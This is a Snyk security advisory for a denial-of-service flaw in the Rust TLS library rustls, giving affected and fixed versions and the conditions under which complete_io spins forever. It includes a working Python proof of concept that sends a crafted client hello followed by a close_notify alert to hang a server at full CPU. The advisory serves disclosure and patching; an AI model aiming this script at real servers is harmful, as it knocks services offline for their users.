Loop with Unreachable Exit Condition ('Infinite Loop') Affecting rustls package, versions >=0.21.0 <0.21.11 >=0.22.0 <0.22.4 >=0.23.0 <0.23.5


0.0
high

Snyk CVSS

    Attack Complexity Low
    Availability High

    Threat Intelligence

    Exploit Maturity Proof of concept
    EPSS 0.05% (15th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID SNYK-RUST-RUSTLS-6670039
  • published 21 Apr 2024
  • disclosed 19 Apr 2024
  • credit Unknown

How to fix?

Upgrade rustls to version 0.21.11, 0.22.4, 0.23.5 or higher.

Overview

rustls is a modern TLS library in Rust.

Affected versions of this package are vulnerable to Loop with Unreachable Exit Condition ('Infinite Loop') through the complete_io function. An attacker can cause the server to enter an infinite loop, leading to 100% CPU usage and preventing the server from handling legitimate requests by sending a close_notify message immediately after a client_hello message.

Note

  1. Exploiting this vulnerability is possible when using a blocking rustls server with:

eof: false until_handshaked: true self.is_handshaking(): true self.wants_write(): false self.wants_read(): false

  1. Callers who do not call complete_io are not affected.

  2. rustls-tokio and rustls-ffi do not call complete_io and are not affected.

  3. rustls::Stream and rustls::StreamOwned types use complete_io and are affected.

PoC

Run simple server: cargo run --bin simpleserver test-ca/rsa/end.fullchain test-ca/rsa/end.key

Run following python script:


#!/usr/bin/env python3

import socket

sock = socket.socket() sock.connect(("localhost", 4443))

print("Sending client hello...")

Fake handshake data of a client hello message.

fake_handshake = """ 1603 0100 c801 0000 c403 03ec 12dd 1764 a439 fd7e 8c85 46b8 4d1e a06e b3d7 a051 f03c b817 470d 4c54 c5df 7200 001c eaea c02b c02f c02c c030 cca9 cca8 c013 c014 009c 009d 002f 0035 000a 0100 007f dada 0000 ff01 0001 0000 0000 1600 1400 0011 7777 772e 7769 6b69 7065 6469 612e 6f72 6700 1700 0000 2300 0000 0d00 1400 1204 0308 0404 0105 0308 0505 0108 0606 0102 0100 0500 0501 0000 0000 0012 0000 0010 000e 000c 0268 3208 6874 7470 2f31 2e31 7550 0000 000b 0002 0100 000a 000a 0008 1a1a 001d 0017 0018 1a1a 0001 00 """

def parse_fake_handshake(): i = 0 data = bytearray() while i < len(fake_handshake): while i < len(fake_handshake) and fake_handshake[i].isspace(): i += 1 if i >= len(fake_handshake): return data

    c1 = fake_handshake[i]
    c2 = fake_handshake[i + 1]
    i += 2

    data.append(int(c1, 16) * 16 + int(c2, 16))
return data

data = parse_fake_handshake()

print("Fake client hello:", data)

sock.send(data)

Send close_notify alert that we're closing the connection.

close_data = bytearray([0x15, 0x03, 0x03, 0x00, 0x02, 0x01, 0x00]) print(f"close_notify is {close_data}") sock.send(close_data) print("close_notify sent")

exit(0)

You could observe the server process get into 100% cpu usage, and if you add logging at beginning of rustls::conn::ConnectionCommon::complete_io, you could see the function is spinning.